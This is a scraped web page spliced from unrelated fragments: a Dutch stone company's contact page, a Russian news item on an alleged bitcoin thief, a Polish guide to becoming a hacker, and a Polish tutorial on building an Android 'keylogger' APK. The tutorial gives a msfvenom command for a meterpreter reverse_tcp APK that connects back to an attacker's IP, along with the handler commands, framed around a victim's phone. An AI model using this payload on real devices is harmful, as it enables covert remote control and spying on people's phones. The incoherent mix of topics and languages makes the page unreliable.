Contact - Haker Natuursteen Haker Email

Contents of the article

Photoreceptors and Light Signalling: RSC (Comprehensive .

Согласно публичной информации, человек, арестованный за кражу в Пенсильвании и именующий себя «хакером», утверждает, что украл $34 млн. в биткоинах.

Согласно заявлению о возбуждении уголовного дела, поданному в Восточный округ федерального суда штата Пенсильвания, мужчина по имени Теодор Прайс, был задержан за кражу двух ноутбуков и золотого ожерелья.

Хотя история могла показаться не такой уж значительной, во время последующего расследования раскрылись более интересные детали. Прайс, в конце концов, сообщил, что он украл тайник со значительным количеством биткоинов.

Сначала полиция обнаружила, что он использовала сеть Tor для совершения покупок в Alpha Bay, тёмном рынке, который недавно был закрыт. Позже он признал, что купил программное обеспечение в Alpha Bay и сам его перекодировал для того, чтобы «имитировать ту же самую кодировку, которую блокчейн использует для создания биткоин кошельков».

Затем, предположительно, он взломал компьютеры, чтобы увести средства на кошельки, которые создал сам. Прайс говорит, что он даже попытался «отмыть» биткоины, переправив их на другой адрес и обменяв их на другую валюту.

Однако пока слова новоявленного «хакера» не подтверждены. Кроме того, отсутствие секретных ключей ставит под сомнение доступ Прайса к кошелькам.

Хотите больше новостей Facebook. Быстрее всех Telegram и Twitter Splash PRO EX

Подписывайтесь!

Read more Naprawa komputerow w Hickory Hills oraz Chicago. Czyszczenie, przyspieszanie, usuwanie wirusow, instalacja systemu, Antywirus do 3 lat Gratis.,Aaj Tak News Channel Office Address, Phone Numbers, Helpline, Email ID -We are sharing all possible informaiton regarding Aaj Tak News Channel office,Poznawaj nowe slowka angielskie, przyslowia i zwroty otrzymujac je co drugi dzien (wraz z wymowa) wprost na skrzynke mailowa.

Read more All in One Floor Extended Printed Backdrop . Custom Event Floor Extended Backdrop NOTE: After your order has been placed, please email image files to .,Contact Facebook Customer Service. Find Facebook Customer Support, Phone Number, Email Address, Customer Care Returns Fax, 800 Number, Chat and Facebook FAQ. Speak .,Результаты поиска

Read more Naprawa komputerow w Hickory Hills oraz Chicago. Czyszczenie, przyspieszanie, usuwanie wirusow, instalacja systemu, Antywirus do 3 lat Gratis.,Official website featuring music, video, tour dates, latest photos and webstore.,Contact opnemen. Heeft u vragen en/of opmerkingen aarzel dan niet op contact met ons op te nemen, wij zullen zo spoedig mogelijk reageren.

Heeft u vragen en/of opmerkingen aarzel dan niet op contact met ons op te nemen,

wij zullen zo spoedig mogelijk reageren.

Herculesstraat 28
1812 PH Alkmaar
tel: 072 5402726
fax: 072 5401118
[email protected]
Haker op Facebook


Openingstijden

Ma t/m Do: 08.30 - 17.00 Vrijdag: 08.30- 12.30

Op feestdagen zijn wij gesloten.


Na een telefonische afspraak kunt u ook buiten onze werktijden een bezoek brengen aan ons bedrijf Internet Download Manager


Op de kaart


Grotere kaart weergeven

Facebook

Zostań hakerem za darmo! To jest i było od zawsze w Tobie… Na pewno do Twoich uszu z medialnego bełkotu docierają czasami głosy o brawurowych akcjach hackerskich takich grup jak Anonymous. Zastanawiasz się właśnie wtedy jak zostać hakerem, prawda Coraz więcej dostajemy informacji zwrotnych od Was właśnie z takim pytaniem…

Dzisiaj przybliżymy nasz punkt widzenia na ten temat. Opracowaliśmy specjalnie dla Ciebie 10 subiektywnych kroków w których kierunku musisz iść, jeżeli chcesz zostać specjalistą w swojej dziedzinie. W wielu akapitach znajdziesz również kilka pomocnych odnośników do kursów lub wideo publikacji, przydatnych w nauce nowego zawodu. Punkty poszeregowaliśmy w dosyć lekki i subiektywny sposób od najważniejszych do tych mniej istotnych.

Kim jest haker i co ma wspólnego ze skrzypcami

Od razu zakładam iż zdajesz sobie sprawę, że nie istnieją żadne magiczne programy hakerskie. Na pewno widziałeś, że wielu filmach sensacyjnych w celu przedostania się niepostrzeżenie się do rządowego systemu informatycznego wystarczy, że bohater wciśnie kilka losowych klawiszy na swojej klawiaturze komputerowej. Już po chwili na swoim ekranie widzi informacje o poprawnym zalogowaniu się do supertajnego systemu rządowego. Bujda na resorach dla małych dzieci…

Prawda jest oczywiście zupełnie inna. Wiele ataków informatycznych wymaga czasu. Można powiedzieć, że jest to wręcz gra logiczna tocząca się pomiędzy systemem operacyjnym a pentesterem. Reguły tej gry są bezwzględne i warunkiem w niej uczestnictwa jest rozległa wiedza i doświadczenie. Dlatego z patrząc z tej perspektywy produkty typu szkoła hakerów, reklamujące się tekstami jak zostać hakerem w 1 lub 2 noce są troszkę zabawne…

Warto odpowiedzieć sobie najpierw na pytanie kim jest haker Naszym zdaniem to pojęcie w ostatnich latach jest bardzo przejaskrawione przez media i my odchodzimy powoli od słownikowych definicji znaczenia tego wyrazu.

Naszym zdaniem prawdziwy haker to osoba dążąca do bycia ekspertem w bardzo wąskiej specjalizacji. Jest to człowiek kreatywny i bez problemu radzący sobie z wykorzystywaniem wszelakich narzędzi i rozwiązań informatycznych w zupełnie niekonwencjonalny sposób. W gruncie rzeczy prawdziwym hakerem (ewentualnie crackerem) można nazwać nie tylko osoby związane z informatyką.

Jeśli spojrzysz na prawdziwych rzemieślników (np: instrumentów muzycznych) zauważysz, że skrywają oni wiele sekretów przekazywanych z pokolenia na pokolenie. Właśnie dlatego ich wyroby są tak doskonałe. Zostały opracowane przez lata poprzez doświadczenie. Często również się zdarza w takich przypadkach, że sam proces produkcyjny wykonywany jest w sposób unikalny na skalę światową nadając tym samym specyficzny końcowy efekt.

Dlatego właśnie to Tobie życzę, abyś został Stradivariusem naszych czasów w swojej ukochanej dziedzinie. W końcu od stuleci mówi się, że człowiek jest osobą ciekawską. Ze względu na tematykę bloga my dzisiaj oczywiście zajmiemy się aspektem wkraczania nowicjuszu w nurt haktywizmu.

Jak zostać hakerem

Poniżej zebraliśmy dla Ciebie dziesięć najważniejszych porad, których musisz się trzymać w swoim dążeniu do zostania mistrzem sztuki hakerskiej. Chcieliśmy zaznaczyć na wstępie, że haker to nie koniecznie przestępca chociaż i takie osoby się zdarzają. Nie bójmy się ich określać mianem cybernetycznych bandytów.

1. Ucz się programowania

Jak na wstępie zaznaczyliśmy sztuka hakerska nie opiera się na wykorzystanie magicznych gotowych programów komputerowych. Przede wszystkim powinieneś zająć się ich pisaniem. Do tego wymagana jest oczywiście szeroko pojęta wiedza na temat informatyki i programowania.

Jeżeli odnajdziesz w pisaniu programów komputerowych i prostych skryptów pasje to być może okażę się, że będzie to Twój zawód dosyć rozchwytywany na rynku pracy i dający zadowolenie na całe życie.

Od czego zacząć przygodę z programowaniem

Przede wszystkim od wyboru języka i konkretnej specjalizacji a naszym zdaniem jest ich kilka. Warto zapoznać się z poniższymi statystykami dotyczącymi wykorzystania języków programowania w roku 2015.

Języki programowania najczęściej wykorzystywane wśród użytkowników Stack Overflow Źródło qz.com

Jak wynika z naszego doświadczenia, nie warto uczyć się języków które rynek powoli wypiera. Przede wszystkim jeżeli będziesz wykorzystywać topowe technologie to łatwiej będzie Ci szukać rozwiązań swoich problemów wśród grona społeczności Internetowej.

Co my proponujemy w odniesieniu do sztuki hakerskiej

Poniżej zestawiliśmy kilka ogólnikowych dziedzin zainteresowań hakerów. Języki zostały uporządkowane przez Nas w subiektywny sposób według preferowanej kolejności ich nauki.

 • Specjalista od web aplikacji (PHP/SQL/JS/HTML/CSS)
 • Programista użytkowy (Python/C /Bash/BATCH/SQL/Java/C#/Delphi)
 • Niskopoziomowy szukacz luk i projektant malware (C/C /Assembler)
 • Podstawowy klasyk (C /PHP/Python)

Pamiętaj tylko, aby na tym nie zaprzestawać. Będzie łatwiej Ci czytać cudzy kod źródłowy, jeśli będziesz znał chociaż w podstawowym stopniu składnie danego, wcześniej zupełnie egzotycznego dla Ciebie języka programowania. Jeżeli już w wystarczającym stopniu opanujesz podstawy języka to zainteresuj się zagadnieniami bibliotek zewnętrznych i frameworków. Warto również zwrócić wtedy swój wzrok na publikacje dotyczące programowania sieciowegoWinAPI.

Polecam Tobie przy okazji świetny podcast, który znalazłem w poszukiwaniu materiałów dla Ciebie znajdujący się w serwisie YouTube. Dotyczy on właśnie tematu wkroczenia w świat programowania komputerów.

2. Zapoznaj się z innymi systemami operacyjnymi

W pewnym momencie Twojej edukacji możesz poczuć pewną niemoc. O ile sam język programowania w połączeniu z bibliotekami standardowymi dostarcza Tobie wiele możliwości, to w końcu nadejdzie ten moment w którym stwierdzisz, że i tak nic konkretnego nie potrafisz napisać.

Jeśli chcesz pisać użyteczne skrypty i programy poznawaj nie tylko elementy języka, ale i samego systemu operacyjnego Microsoft Windows. Dodatkowo wartym poznania jest system Linux. Posiada on olbrzymią ilość darmowych aplikacji sieciowych, które również możesz wywoływać za pomocą odpowiednich funkcji w swoich aplikacjach.

Większość z programów w systemie Linux jak i on sam posiada otwarty kod źródłowy. Takie programy często są określane mianem aplikacji Open Soruce. Oznacza to, że bez problemu możesz zajrzeć do ich kodu źródłowego a nawet go zmodyfikować i sprzedawać.

Kilka dystrybucji systemu Linux do codziennego użytku proponowanych przez witrynę jakilinux.org. Z powodzeniem możesz je wypróbować w codziennych zastosowaniach i nauce samego systemu operacyjnego i programowania.

Bardziej modularna budowa Linuksa pozwala oczywiście na praktycznie dowolną konfiguracje pod swoje wymagania i preferencje. Jeśli chodzi o konkretne systemy służące do testów penetracyjnych to już kiedyś ten temat omówiliśmy w publikacji 47 systemów operacyjnych Linux dla hakerów. Zaletą takiego gotowca dla audytora jest wstępne przygotowanie już narzędzi do pracy za nami. Oczywiście wszystkie potrzebne aplikacje do testów bezpieczeństwa możesz doinstalować sam w każdym z powyższych systemów operacyjnych.

Wydaje mi się, że lepszą nauką na początek dla Ciebie będzie skorzystanie z takich dystrybucji jak Ubuntu lub Debian i doinstalowanie potrzebnych aplikacji ręcznie. Na pewno nauczysz się wtedy więcej na temat konfiguracji i użytkowania Linuksa, niż korzystając z gotowej dystrybucji takiej jak Kali Linux.

3. Studiuj dokumentacje

Praktycznie każdy program uruchamiany w czarnej konsoli posiada dołączony podręcznik lub dokumentacje techniczną dostępną online. Również sam język programowania jak i zewnętrzne biblioteki rozszerzające jego możliwości udostępniają dokumentacje techniczną objaśniającą jego działanie.

Bardzo często w samej dokumentacji znajdziesz przykłady działania aplikacji lub fragmenty gotowego kodu źródłowego do wykorzystania w Twoich przyszłych hobbistycznych projektach. Dzięki studiowaniu tego typu dokumentów na pewno zyskasz cenną wiedzę. Bardziej zaawansowanym użytkownikom, tego typu pomoc może zastąpić nawet papierowe książki.

4. Czytaj eksperckie blogi IT

Prawdziwy haker musi być na bieżąco z nowymi technologami i trendami występującymi w sieci Internet. Dlatego warto poświęcać trochę czasu w swoim krótkim tygodniu na wertowaniu Internetu w poszukiwaniu technologicznych newsów, dotyczących cyberprzestępczości lub samych nowinek technologicznych. Być może to właśnie one zainspirują Ciebie do wcielenia w życie nowych kreatywnych pomysłów. Rób to oczywiście regularnie. Kilka adresów www, które naszym zdaniem są warte uwagi zamieszczamy poniżej:

 • niebezpiecznik.pl,
 • aufanatrzeciastrona.pl,
 • securityweek.com.

Nie zapominaj również o mniejszych autorskich hobbistycznych blogach. Odnajdziesz na nich wiele ciekawych poradników i rozwiązań technicznych. Najczęściej prowadzą to pasjonaci i wielką zaletą dla Twojej informatycznej kreatywności, będzie szeroki wachlarz tematyki poruszanej na ich stronach internetowych.

Pamiętaj też o sieciach społecznościowych. Szczególnie na Twitterze bardzo szybko znajdziesz wiele ciekawych hot newsów po samych #hashtagach prosto od grup zajmujących się bezpieczeństwem IT. Przykładem mogą być oficjalne konta firm programów antywirusowych takich jak Kaspersky Lab lub Norton.

Bądź na bieżąco z newsami za pomocą czytników RSS

Polecam również zapoznać się z możliwościami czytników RSS. Żeby nie wymyślać koła na nowo (o czym wkrótce się dowiesz) zacytujemy fragment kogoś mądrzejszego na ten temat:

RSS – umowna rodzina języków znacznikowych do przesyłania nagłówków wiadomości i nowości na wybranych przez użytkownika RSS stronach. Wystarczy dodać daną stronę (musi ona obsługiwać system RSS) do czytnika RSS. Wszystkie w większym lub mniejszym zakresie bazują na XML-u. Aby skorzystać z kanału RSS, potrzebny jest odpowiedni program, tzw. czytnik kanałów. Często czytniki RSS-ów są zamieszczane w programach pocztowych.

Źródło: Wikipedia.org

Przekładając to na ludzki język, wykorzystanie RSS umożliwia subskrybowanie pewnych witryn w Internecie. W ten sposób zaraz po publikacji nowego wpisu przez autora jesteś na bieżąco, ponieważ Twój czytnik poinformuje Cię o nowościach na Twoich ulubionych subskrybowanych witrynach. Niektóre przeglądarki internetowe takie jak Mozilla Firefox udostępnią wbudowany czytnik RSS. Istnieją również czytniki dedykowane urządzeniom mobilnym z systemem Windows Phone, SymbianAndroid lub iOS.

Jeśli chciałbyś subskrybować Nasz kanał RSS wystarczy, że wciśniesz poniższy przycisk. Uzyskasz wtedy adres naszego kanału powiadomień RSS:

5. Czytaj książki, darmowe poradniki i oglądaj wideo

W literaturze technicznej pojawia się coraz więcej publikacji na temat hackingu w naszym rodzimym języku. Wiele książek z zakresu security IT możesz znaleźć w zbiorze wydawnictwa Helion i PWN:

Nie zależnie czy chcesz stać po tej dobrej czy też złej stronie społeczności hakerów, to nie ograniczaj się tylko do nauki audytowania systemów informatycznych i samego programowania. Jeżeli posiadasz już jakąś wiedzę warto doskonalić swoje umiejętności. Przykładowo jedną aplikacje można napisać na miliony sposobów, dlatego trzeba wiedzieć jak to robić dobrze. Warto tutaj zainteresować się tematem wzorców projektowych, scrum i wielu innych zawiłych (tylko na pierwszy rzut oka) zagadnień.

Naszym zdaniem jedną z fajniejszych książek dla początkujących dotyczących sztuki hakerskiej jest Bezpieczny system w praktyce autorki Georgia Weidman

Naszym subiektywnym zdaniem pierwsze książki, które powinieneś przeczytać to te na temat programowania, systemu operacyjnego Linux a następnie dopiero przejść do publikacji bardziej specjalistycznych dotyczących hackingu. Nie przechodź obojętnie również obok zagadnień bazodanowych, bo to jak się okazuje zawsze się przydaje. Ucz się SQL, a to zaowocuje.

Pamiętaj, że do większości książek możesz znaleźć w Internecie spis treści i opis. Warto przed zakupem przestudiować w ten sposób materie poruszane w książce. Sprawdzisz wtedy, czy będą one odpowiadać Twoim oczekiwaniom.

Poniżej przedstawiam tylko kilka książek, które mieliśmy w ręku i jak najbardziej możemy polecić.

Książki do programowania i nauki hackingu dla początkujących

 • PHP i MySQL. Tworzenie stron WWW. Vademecum profesjonalisty (Luke Welling, Laura Thomson)
 • Python od podstaw (Zespół autorów, ISBN 83-246-0528-2, 8324605282)
 • Bezpieczny system w praktyce. Wyższa szkoła hackingu i testy penetracyjne (Georgia Weidman)
 • SQL. Rusz głową! (Lynn Beighley)

Książki dla tych trochę bardziej zaawansowanych

 • Język C . Szkoła programowania (Stephen Prata)
 • Metasploit. Przewodnik po testach penetracyjnych (David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni
 • Czysty kod. Podręcznik dobrego programisty (Robert C. Martin)
 • Hacking. Sztuka penetracji. Wydanie II (Jon Erickson)
 • Jak pisać wirusy (Andrzej Dudek, już troszkę stara ale nadal wartościowa  merytorycznie dla przyszłych twórców malware)

Kilka legalnych darmowych publikacji

Skłamałbym jeśli stwierdziłbym, że wiedzy dzisiaj nie można uzyskać w Internecie zupełnie za darmo. Jak najbardziej jest to twierdzenie fałszywe. W sieci istnieje olbrzymia ilość bezpłatnych szybkich wprowadzeń do danego tematu i darmowych kursów. Poniżej zebrałem tylko kilka z nich:

Pamiętaj, że wiele materiałów za darmo uzyskasz również na witrynach akademickich. Czasami są to całe darmowe kursy poświęcone całemu zagadnieniu.

Tekst to nie wszystko – szukaj treści audio wizualnych

Warto szukać informacji dosłownie wszędzie. Rób to również w serwisach video typu YouTube. Na naszym blogu w zakładce wideo/download i na naszym kanale YouTube znajdziesz również od Nas kilkanaście darmowych materiałów filmowych. Poniżej ponadto udostępniamy znaleziony przez Nas, dosyć fajny wideo kurs programowania od podstaw w języku C .

Na kanale użytkownik Mirosław Zelent posiada również playlistę z bardziej zaawansowaną wersją kursu z programowania obiektowego w języku C . Oba materiały są godną uwagi.

Dużo też fajnych wideo kursów premium z lektorem znajdziesz na eduweb.pl. Oczywiście książki techniczne to nie wszystko. Jeśli chcesz być kreatywny to chłoń wiedzę z każdego możliwego źródła, nie koniecznie związanego z Twoim umiłowaniem do danej dziedziny. Książki filozoficzne i fabularne Czemu nie! I tam znajdziesz multum pomysłów na ulepszanie swojej osoby i kreatywności. Biografie takich ludzi jak Steve Jobs albo Benjamin Franklin również potrafią kształcić.

6. Zdobądź edukacje

Wszyscy chcą posiadać wiedzę, ale nikt nie jest chętny, aby za nią zapłacić.
– Juwenalis

Oczywiście można być samoukiem, ale warto zastanowić się nad swoją przyszłością. Jeżeli temat bezpieczeństwa bardzo Ciebie kręci to czemu nie robić tego profesjonalnie i zawodowo Jeśli jesteś jeszcze młody i nie wybrałeś swojej ścieżki rozwoju warto się nad nią już teraz zastanowić. W końcu połączenie hobby, nauki i pracy w jedno to bardzo przyjemna rzecz. Jeżeli do tego generuje to pokaźny zastrzyk zielonych dolarów to i Ty jesteś już zupełnie na tak, prawda

Zapamiętaj jeśli chcesz być dobry w swoim fachu musisz być wszechstronny i kreatywny. Dlatego warto obrać ścieżkę, która tylko pozornie uczy rzeczy nie potrzebnych. Często się słyszy, że w Polsce na studia iść nie warto. Nie uczą rzeczy przydatnych, tylko tworzą akademicką papkę z mózgu. Na jakiej podstawie osoba, która nie spotkał się z tematem wysnuwa wniosek, że jej się to w życiu nigdy nie przyda. Na studiach nie tylko zdobywasz wiedzę ale i charakter, kreatywność i samozaparcie.

W ostatnich latach widać znaczący trend wzrostu zapotrzebowania na nowych inżynierów Źródło: PrimeSoft Polska

Jak widać na powyższym wykresie, każda branża potrzebuje coraz więcej technicznych specjalistów z powodu wzrostu automatyzacji procesów na całym świecie. Rynek pracy również coraz więcej potrzebuje ludzi zajmujący się zawodowo bezpieczeństwem informatycznym. Cyber ataki na firmy będą coraz powszechniejsze. Więc dlaczego miałbyś na tym nie zarobić

Po prostu zostań profesjonalnym informatykiem od bezpieczeństwa sieciowego. Pamiętaj, że wzrost konkurencji na rynku pracy będzie wymuszał w przyszłości konieczność posiadania odpowiedniego potwierdzenia solidności swojej osoby, poprzez dyplom uczelni lub przebyte odpowiednie certyfikowane kursy.

Podsumowując ten podpunkt w praktyce. Jeśli interesuje Cię informatyka idź do liceum o profilu fizycznym lub matematycznym. Alternatywnie wybierz technikum informatyczne. Następnie zwróć swój wzrok na uczelnie techniczne, na których uzyskasz tytuł inżyniera i magistra. Zwróć uwagę również na specjalizacje i siatkę studiów dostępną publicznie w Internecie. Wiele uczelni posiada specjalizacje dotyczące właśnie bezpieczeństwa informatycznego. Pamiętaj! Zawsze kieruj się swoimi zainteresowaniami, a nie chwilową fascynacją tematem.

7. Nie wymyślaj koła na nowo, Stack Overflow już je ma

Bardzo popularnym błędem w każdej dziedzinie życia, jest próba rozwiązywania problemu na nowo. Być może dla młodego nie wykształconego jeszcze umysłu myślenie i wnioskowanie jest wartościowym mechanizmem, jednak dla Ciebie raczej już nie.

Zawsze rozpocznij rozwiązywanie problemu od poszukiwania informacji we wszystkich dostępnych w danej chwili dla Ciebie źródłach. Być może ktoś już ten problem rozwiązał i nie będziesz musiał tracić godzin a być może nawet dni lub miesięcy na wynajdowania koła na nowo. Używanie CTRL C i CTRL V nie jest wcale haniebne w środowisku hakerów. Wręcz przeciwnie. Pamiętaj jednak, że nie mam na myśli oczywiście bezmyślnego kopiowania autorskich publikacji lub prac domowych… Wiele rozwiązanych już problemów znajdziesz  w serwisie github.com lub na kultowym już forum stackoverflow.com.

Takie podchodzenie do problemu jest bardzo istotne szczególnie dla programistów. Przykładowo istnieje duża szansa, że jeżeli szukasz sposobu na wysyłanie wiadomości e-mail w języku C to już  ktoś kiedyś to zrobił za Ciebie i udostępnił publicznie. Wykorzystaj jego udostępniony kod źródłowy. Jeśli coś Ci w nim nie pasuje lub kod posiada pewne błędy to poinformuj o tym autora. Jeśli natomiast licencja kodu źródłowego na to pozwala, a potrzebujesz nieco innej funkcjonalności to go po prostu zmodyfikuj i udostępnij. Zaoszczędzisz tym mnóstwo czasu sobie i innym.

Dobrą nauką również jest zamiast implementowania rozwiązania od zera to czytania gotowych kodów źródłowych. Być może ktoś to zrobił lepiej od Ciebie, a Ty wyciągniesz z tego wnioski na przyszłość.

8. Udzielaj się w środowisku i uwalniaj źródła

Dawno, dawno temu w zamierzchłych czasach popularne były kanały IRC… było to oczywiście swoistego rodzaju czaty internetowe. Na wielu kanałach rodziły się Internetowe miłości, dramaty i całe inteligentne społeczności dzielące się wiedzą. Dzisiaj tego typu komunikacja powoli odchodzi do lamusa. Jeśli chcesz być użyteczny dla innych, tak jak inni są dla Ciebie publikując darmową wiedzę to nie zostawaj duchem.

Warto dążyć do pozytywnej rozpoznawalności w sieci. Wybierz sobie swój pseudonim z którym będziesz się utożsamiał i regularnie pod jego przykrywką udzielaj się w sieci. Zarejestruj się na popularnych forach dotyczących informatyki, bezpieczeństwa i programowania. Prowadź dyskusje i nie bój się pytać innych jeżeli nie znalazłeś odpowiedzi na nurtujące Cię pytania w Internecie.

W internecie dostępnych jest bardzo wiele aplikacji z otwartymi źródłami do których rozwoju przyczynili się również hakerzy popularyzując tą ideologię.

Jeżeli czytając cudze blogi i publikacje uważasz je za godne uwagi to zostaw wartościowy komentarz. Jest to niematerialna zapłata dla autora za poświęcony przez niego czas dla Ciebie. Również jeśli się nie zgadzasz z jakimś autorem to wypowiedz się argumentując swój komentarz w racjonalny sposób. Taka forma śledzenia i komentowania również przez ekspertów innych blogów, jest bardzo budująca i owocna dla obu stron. Merytoryczna dyskusja nigdy nie będzie traktowana jako spam.

W nawiązaniu do poprzedniego podpunktu pamiętaj, jeżeli Ty coś zaimplementowałeś (nawet małego) to udostępnij to innym. Tak właśnie działa budowanie oszczędnego kapitału społeczności internetowej. Ktoś oszczędza czas rozwiązując Twój hackerski problem, a Ty oszczędzasz czas kogoś zupełnie innego i tak właśnie koło wzajemnej adoracji się zamyka. Wymiana wiedzy jest najważniejsza.

9. Prowadź bloga lub stwórz usługę

Powinieneś jak najszybciej stworzyć swoją stronę domową. Co na niej publikować To już zależy już od Ciebie. Wybierz temat, który Cię najbardziej interesuje. Jeśli nie masz jeszcze za wiele do napisania, możesz stworzyć cykl wpisów w których czytelnicy uczą się danego zagadnienia razem z Tobą. Alternatywą może być otworzenie kanału w serwisie YouTube z wideo poradnikami. 

Najważniejsza jest kreatywność i pomysł na prowadzenie swojej sztampowej strony WWW pod swoim pseudonimem. Pomysł oczywiście należy tylko i wyłącznie do Ciebie. Dzisiaj możesz to zrobić już zupełnie za darmo wykorzystując np: darmowego bloggera od Google.

Zupełnie darmowy system do blogowania blogger.com od Google.

Oczywiście jeżeli jesteś bardziej kreatywny, a Twój umysł wypełniają niezliczone pomysły na strony internetowe i ciekawe usługi sieciowe to zabieraj się do implementacji. Być może wyrośnie z Ciebie następca Steve Jobsa :-). Jeśli interesują Ciebie inne możliwości założenia swojej sieciowej wizytówki, to przeczytaj obowiązkowo nasz wpis jak założyć stronę intranetową za darmo.

10. Nie ograniczaj umysłu

Nie specjalizuj się w życiu tylko w jednej bardzo wąskiej dziedzinie. Hakerzy posiadają bardzo szerokie horyzonty. Dla przykładu jeszcze ani razu nie wspomniałem dzisiaj o hardware hackingu. Jeśli lubisz majsterkować i czujesz pociąg do elektroniki to wykorzystaj to w praktyce.

W sieci istnieje wiele osób i społeczności, którzy zajmują się nie tylko łamaniem zabezpieczeń logicznych, ale i tworzeniem bardzo fajnych amatorskich projektów elektronicznych. Wystarczy poszukać i spojrzeć na cuda jakie ludzie wyprawiają z platformą Raspberry Pi lub Arduino. Myślisz, że atak brute-force jest nie wydajny i nudny Spójrz na poniższe wideo…

Twórz społeczność wymieniając się spostrzeżeniami będąc po prostu jej członkiem. Na pewno poznasz wtedy wiele ciekawych osób i nie będą to nic nie robiący gimnazjaliści z Anonymous Polska. Nie ograniczaj się tylko do naszych przykładów, każdy haker powinien być wszechstronny w każdej dziedzinie interesującej go nauki.

Podsumowanie – chce zostać hakerem w 1 lub 2 noce

Postanowiliśmy w dosyć ironiczny sposób zakończyć ten obszerny poradnik dotyczący hakerstwa i jego nauki. Podsumowując zacznij już dzisiaj od programowania prostych aplikacji, aby następnie wykorzystać potencjał drzemiący w bibliotek zewnętrznych i frameworkach. Poznawaj systemy operacyjne, których używasz od podszewki i na tym nie poprzestawaj. Studiując dokumentacje techniczną i blogi specjalistyczne wyciągaj wnioski. Nie bój się zadawać pytań takich jak dlaczego i unikaj zastanawiania się nad problemami już rozwiązanymi. Niech Cię też nie boli konstruktywna krytyka. Jak mawiał Benjamin Franklin:

Szkoła doświadczenia kosztuje, ale żadna inna nie potrafi lepiej wykształcić człowieka.

Bądź jak Franklin wizjoner chwytający się wszelakich zajęć i nie bojący się ich podjąć. Zawsze poszukuj legalnych i darmowych źródeł do nauki z wszelakich dziedzin pokrewnych, które właśnie Ciebie interesują. Należy szanować własność intelektualna i wkład innych włożony w pracę. Jeśli wiążesz przyszłość z informatyką to podążaj zawodowo w kierunku typowo inżynierskim. Teraz pojawiają się jak grzyby po deszczu szkoły IT, więc ze znalezieniem miejsca dla siebie nie będzie problemu. Bądź aktywny w sieci pod jednym pseudonimem i nie trolluj innych użytkowników. Udostępniaj czytelnikom swoją wiedzę prowadząc swoją własną stronę domową. Możesz na niej również zbierać odnośniki do ciekawych materiałów do których powrócić będziesz chciał być może w przyszłości… i przede wszystkim nie poprzestawaj nawet jak brakuje Ci sił. Jeśli udało Ci się już przeczytać dziesięć naszych porad mówiących o tym jak zostać hakerem, to jestem pewien zainteresuje Cię nasz darmowy kurs  hakerstwa składający się z 6 lekcji wraz z instrukcją wideo i komentarzem:

Lekcja 1: Przygotowanie środowiska hakerskiego

Na świecie istnieje jeszcze olbrzymia ilość zagadek do rozwiązania. Zostań hakerem wiedzy, nie trać czasu. No i oczywiście śledź Nas na facebooku @HakerEduPL, będąc tym samym na bieżąco z naszymi wpisami i filmami Splash PRO EX

Może zostaw po sobie też komentarz lub pytanie Powodzenia!

Keylogger Android APK - haker.edu.pl

Zastanawiasz się, czy Twój smartfon jest bezpieczny Wiele dostaliśmy wiadomości od Was o takiej treści jak: czy istnieje szpieg sms, keylogger Android lub ewentualnie czy jest możliwa lokalizacja telefonu komórkowego. Teraz czas na oficjalną odpowiedź… Tak. Hakowanie systemu z robocikiem jest to jak najbardziej możliwe. Wykorzystamy dzisiaj do tego pakiet dla hakerów Metasploit, wraz z jego narzędziem msfvenom. Pamiętajcie jednak, że nie istnieją magiczne strony internetowe na których możecie sprawdzić takie informacje. Jest to po prostu naciąganie Was na pieniądze (abonament SMS). Audyt systemów informatycznych wymaga po prostu wiedzy a nie naiwności. Przejdźmy do rzeczy. Utworzymy dzisiaj coś na wzór darmowego pliku Android keylogger APK. Jednak technicznie nie jest to do końca aplikacja monitorując klawisze…

Tworzymy keylogger Android APK

Jak zwykle zaopatrz się w najnowszy darmowy system operacyjny Kali Linux wielokrotnie już przez nas opisywany. My dodatkowo zainstalowaliśmy Androida w bardzo popularnej wersji 4.4 KitKat (root) w VirtualBox w celach testowych. Polecamy również przed przystąpieniem do lektury zapoznanie się jeśli tego jeszcze nie zrobiłeś z następującym wpisem o ładunkach payload:

Payload – hakerskie narzędzie msfvenom

Wideo prezentujące atak na system Android

Poniżej zamieszczamy film instruktażowy dotyczący dalszej części tego wpisu. Poruszamy w nim również aspekty dlaczego nie warto instalować nielegalnego oprogramowania w swoich systemach mobilnych i sprawdzamy skuteczność antywirusa. Zachęcamy do subskrybowania kanału na YouTube, jeśli chcesz być stale na bieżąco.

Generowanie za pomocą meterpretera aplikacji APK

Wydaj w konsoli Kali Linux następujące polecenie:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.42 LPORT=16666 -f raw > aplikacja.apk

Powyższe polecenie wygeneruje w katalogu bieżącym plik o nazwie aplikacja.apk.

Objaśnienie parametrów polecenia msfvenom:

 • -p – typ użytego ładunku. W naszym przypadku używamy meterpretera dedykowanego dla systemu Android.
 • LHOST – adres IP komputera z którym ma się połączyć telefon z Androidem. Jeśli posiadamy zewnętrzny adres IP możemy właśnie jego użyć przekierowując port 16666 na nasz adres lokalnego komputera. Od razu odpowiedź na częste pytanie: tak, działa wtedy to nie tylko w sieci lokalnej LAN.
 • LPORT – port na którym nasłuchujemy połączenia przychodzącego. System Android po uruchomieniu aplikacji właśnie z nim się połączy.
 • -f raw – wskazujemy, że chcemy utworzyć surowy plik.
 • > aplikacja.apk – przekierowanie strumienia do pliku aplikacja.apk. Jest to aplikacja dedykowana dla systemu Android.

Oczekiwanie na połączenie zwrotne pluskwy

Jak pewnie wiecie z wcześniej polecanego wpisu na naszym blogu, payload to nie wszystko… Do działania potrzeba jeszcze utworzenia gniazda oczekującego na połączenie przychodzące od naszej złośliwej aplikacji. Na szczęście pakiet Metasploit posiada gotowy tego typu uchwyt o nazwie multi/handler. Wydaj następujące polecenia jedno pod drugim:

set payload android/meterpreter/reverse_tcp

Po uruchomieniu msfconsole wskazujemy narzędziu, że chcemy użyć multi/handler. Następnie ustawiamy odpowiedni ładunek. Payload musi być tym samym ładunkiem, który użyliśmy do utworzenia aplikacji w msfvenom.

W kolejnym kroku ustawiamy port i nasz adres IP. Również i te parametry podaliśmy w naszej wygenerowanej aplikacji Android z rozszerzeniem apk. Teraz wystarczy uruchomić nasłuchiwanie za pomocą polecenia run. To wszystko. Gdy na telefonie ofiary zostanie uruchomiona aplikacja powinniśmy uzyskać z nią połączenie. Cyberprzestępcy prześcigają się atakach socjaltechnicznych przekonujących ofiarę do pobrania i uruchomienia aplikacji mobilnej, więc tego dzisiaj nie opisujemy.

Ciekawe polecenia Meterpretera Android

Meterpreter udostępnia użytkownikowi bardzo dużą liczbę wbudowanych prostych w użyciu poleceń

